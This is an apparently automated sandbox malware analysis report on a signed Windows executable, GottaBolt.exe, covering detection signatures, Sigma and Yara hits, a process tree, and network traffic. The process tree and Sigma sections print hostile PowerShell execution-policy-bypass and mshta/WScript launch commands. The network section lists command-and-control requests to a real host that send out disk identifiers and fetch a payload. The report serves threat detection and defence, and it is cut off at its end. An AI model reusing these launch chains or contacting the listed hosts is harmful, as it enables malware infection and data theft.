Edit tour

Windows Analysis Report
GottaBolt.exe

Overview

General Information

Sample name:	GottaBolt.exe
Analysis ID:	1561030
MD5:	981c56e26ae89a9190d1f1db9d2683ce
SHA1:	43a46c1736a4f9f5264dab79761b44e2ea0cc18c
SHA256:	79b6e63218982c1e85a5e1798c5484e7e034cfecbe9f2da604f668fda8428af4
Tags:	exeuser-smica83
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

AI detected suspicious sample

Bypasses PowerShell execution policy

Loading BitLocker PowerShell Module

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Sigma detected: MSHTA Suspicious Execution 01

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

Installs a global mouse hook

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Queries time zone information

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Wscript Shell Run In CommandLine

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

GottaBolt.exe (PID: 5760 cmdline: "C:\Users\user\Desktop\GottaBolt.exe" MD5: 981C56E26AE89A9190D1F1DB9D2683CE)

powershell.exe (PID: 5064 cmdline: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 5064 cmdline: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close") MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 4536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 " MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 3228 cmdline: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close") MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 4428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 " MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 5168 cmdline: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close") MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 1252 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 " MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv3.ps1	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: GottaBolt.exe PID: 5760	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 4428	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 4428	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x542c9:$b3: ::UTF8.GetString( 0x514dc:$s1: -join 0x7bc73:$s1: -join 0x88d48:$s1: -join 0x8c11a:$s1: -join 0x8c7cc:$s1: -join 0x8e2bd:$s1: -join 0x904c3:$s1: -join 0x90cea:$s1: -join 0x9155a:$s1: -join 0x91c95:$s1: -join 0x91cc7:$s1: -join 0x91d0f:$s1: -join 0x91d2e:$s1: -join 0x9257e:$s1: -join 0x926fa:$s1: -join 0x92772:$s1: -join 0x92805:$s1: -join 0x92a6b:$s1: -join 0x94c01:$s1: -join 0xa364b:$s1: -join

Other

Source	Rule	Description	Author	Strings
amsi64_4428.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: MSHTA Suspicious Execution 01

Source: Process started

Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close"), CommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close"), ProcessId: 3228, ProcessName: mshta.exe

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\mshta.exe, SourceProcessId: 5064, StartAddress: C6BAAFB0, TargetImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, TargetProcessId: 5064

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close"), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3228, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 ", ProcessId: 4428, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", CommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GottaBolt.exe", ParentImage: C:\Users\user\Desktop\GottaBolt.exe, ParentProcessId: 5760, ParentProcessName: GottaBolt.exe, ProcessCommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", ProcessId: 5064, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", CommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GottaBolt.exe", ParentImage: C:\Users\user\Desktop\GottaBolt.exe, ParentProcessId: 5760, ParentProcessName: GottaBolt.exe, ProcessCommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", ProcessId: 5064, ProcessName: powershell.exe

Sigma detected: Wscript Shell Run In CommandLine

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close"), CommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close"), ProcessId: 3228, ProcessName: mshta.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", CommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GottaBolt.exe", ParentImage: C:\Users\user\Desktop\GottaBolt.exe, ParentProcessId: 5760, ParentProcessName: GottaBolt.exe, ProcessCommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", ProcessId: 5064, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T17:11:47.153718+0100	2056491	1	Malware Command and Control Activity Detected	192.168.2.5	49718	77.91.73.101	443	TCP
2024-11-22T17:11:49.665986+0100	2056491	1	Malware Command and Control Activity Detected	192.168.2.5	49719	77.91.73.101	443	TCP
2024-11-22T17:11:52.199191+0100	2056491	1	Malware Command and Control Activity Detected	192.168.2.5	49720	77.91.73.101	443	TCP
2024-11-22T17:11:54.709108+0100	2056491	1	Malware Command and Control Activity Detected	192.168.2.5	49722	77.91.73.101	443	TCP
2024-11-22T17:11:57.233457+0100	2056491	1	Malware Command and Control Activity Detected	192.168.2.5	49729	77.91.73.101	443	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T17:11:49.665986+0100	2803305	3	Unknown Traffic	192.168.2.5	49719	77.91.73.101	443	TCP
2024-11-22T17:11:52.199191+0100	2803305	3	Unknown Traffic	192.168.2.5	49720	77.91.73.101	443	TCP
2024-11-22T17:11:54.709108+0100	2803305	3	Unknown Traffic	192.168.2.5	49722	77.91.73.101	443	TCP
2024-11-22T17:11:57.233457+0100	2803305	3	Unknown Traffic	192.168.2.5	49729	77.91.73.101	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 84.8% probability

Source: GottaBolt.exe

Static PE information: certificate valid

Source: unknown	HTTPS traffic detected: 77.91.73.101:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.91.73.101:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.91.73.101:443 -> 192.168.2.5:49744 version: TLS 1.2

Source: GottaBolt.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\user\Desktop\NEW-ExpX\AsyncClientNew\AsyncClient\obj\Release\DulidKolmen.pdb source: powershell.exe, 00000008.00000002.4206767598.000001E8F5FB7000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\NEW-ExpX\orel2\AppMsipPack64-Twitter\AppMSIpack\obj\Release\GottaBolt.pdb source: GottaBolt.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056491 - Severity 1 - ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET) : 192.168.2.5:49718 -> 77.91.73.101:443
Source: Network traffic	Suricata IDS: 2056491 - Severity 1 - ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET) : 192.168.2.5:49719 -> 77.91.73.101:443
Source: Network traffic	Suricata IDS: 2056491 - Severity 1 - ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET) : 192.168.2.5:49720 -> 77.91.73.101:443
Source: Network traffic	Suricata IDS: 2056491 - Severity 1 - ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET) : 192.168.2.5:49722 -> 77.91.73.101:443
Source: Network traffic	Suricata IDS: 2056491 - Severity 1 - ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET) : 192.168.2.5:49729 -> 77.91.73.101:443

Source: global traffic	HTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.com
Source: global traffic	HTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.com
Source: global traffic	HTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.com
Source: global traffic	HTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.com
Source: global traffic	HTTP traffic detected: GET /?yjVsmHMwodfFGINSiCsv=YXuuqBFUVgMBaXsghdUv.txt HTTP/1.1Host: dfssinstitute.comConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 77.91.73.101:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49720 -> 77.91.73.101:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49722 -> 77.91.73.101:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49729 -> 77.91.73.101:443

Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228
Source: unknown	TCP traffic detected without corresponding DNS query: 172.86.76.228

Source: global traffic	HTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.com
Source: global traffic	HTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.com
Source: global traffic	HTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.com
Source: global traffic	HTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.com
Source: global traffic	HTTP traffic detected: GET /?yjVsmHMwodfFGINSiCsv=YXuuqBFUVgMBaXsghdUv.txt HTTP/1.1Host: dfssinstitute.comConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: dfssinstitute.com

Source: GottaBolt.exe	String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: GottaBolt.exe	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: GottaBolt.exe	String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: GottaBolt.exe	String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: GottaBolt.exe	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: GottaBolt.exe	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: GottaBolt.exe, 00000000.00000002.2629516834.0000025280307000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dfssinstitute.com
Source: powershell.exe, 00000004.00000002.2368919507.0000024E96770000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4067770851.000001E8ED1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: GottaBolt.exe	String found in binary or memory: http://ocsps.ssl.com0
Source: GottaBolt.exe	String found in binary or memory: http://ocsps.ssl.com0?
Source: GottaBolt.exe	String found in binary or memory: http://ocsps.ssl.com0P
Source: powershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: GottaBolt.exe, 00000000.00000002.2629516834.0000025280299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2346622209.0000024E86701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3942045111.000001E8DD181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.3015755599.000001C1A9EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3604226839.0000025F86677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.2375548989.0000024E9EA7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: GottaBolt.exe	String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: GottaBolt.exe	String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: powershell.exe, 00000004.00000002.2346622209.0000024E86701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3942045111.000001E8DD181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.3015755599.000001C1A9EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.3015755599.000001C1A9F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3604226839.0000025F8668D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3604226839.0000025F86677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: GottaBolt.exe, 00000000.00000002.2629516834.00000252802FE000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.0000025280350000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252803CD000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.000002528041E000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252803F6000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252802F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfssinstitute.com
Source: GottaBolt.exe	String found in binary or memory: https://dfssinstitute.com/
Source: GottaBolt.exe, 00000000.00000002.2629516834.00000252802F1000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.0000025280299000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfssinstitute.com/?rs=user
Source: GottaBolt.exe, 00000000.00000002.2629516834.0000025280350000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252803CD000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.000002528041E000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252803F6000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.0000025280299000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfssinstitute.com/?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f5
Source: powershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfssinstitute.com/?yjVsmHMwodfFGINSiCsv=YXuuqBFUVgMBaXsghdUv.txt
Source: powershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.3015755599.000001C1AA3F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3604226839.0000025F86C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
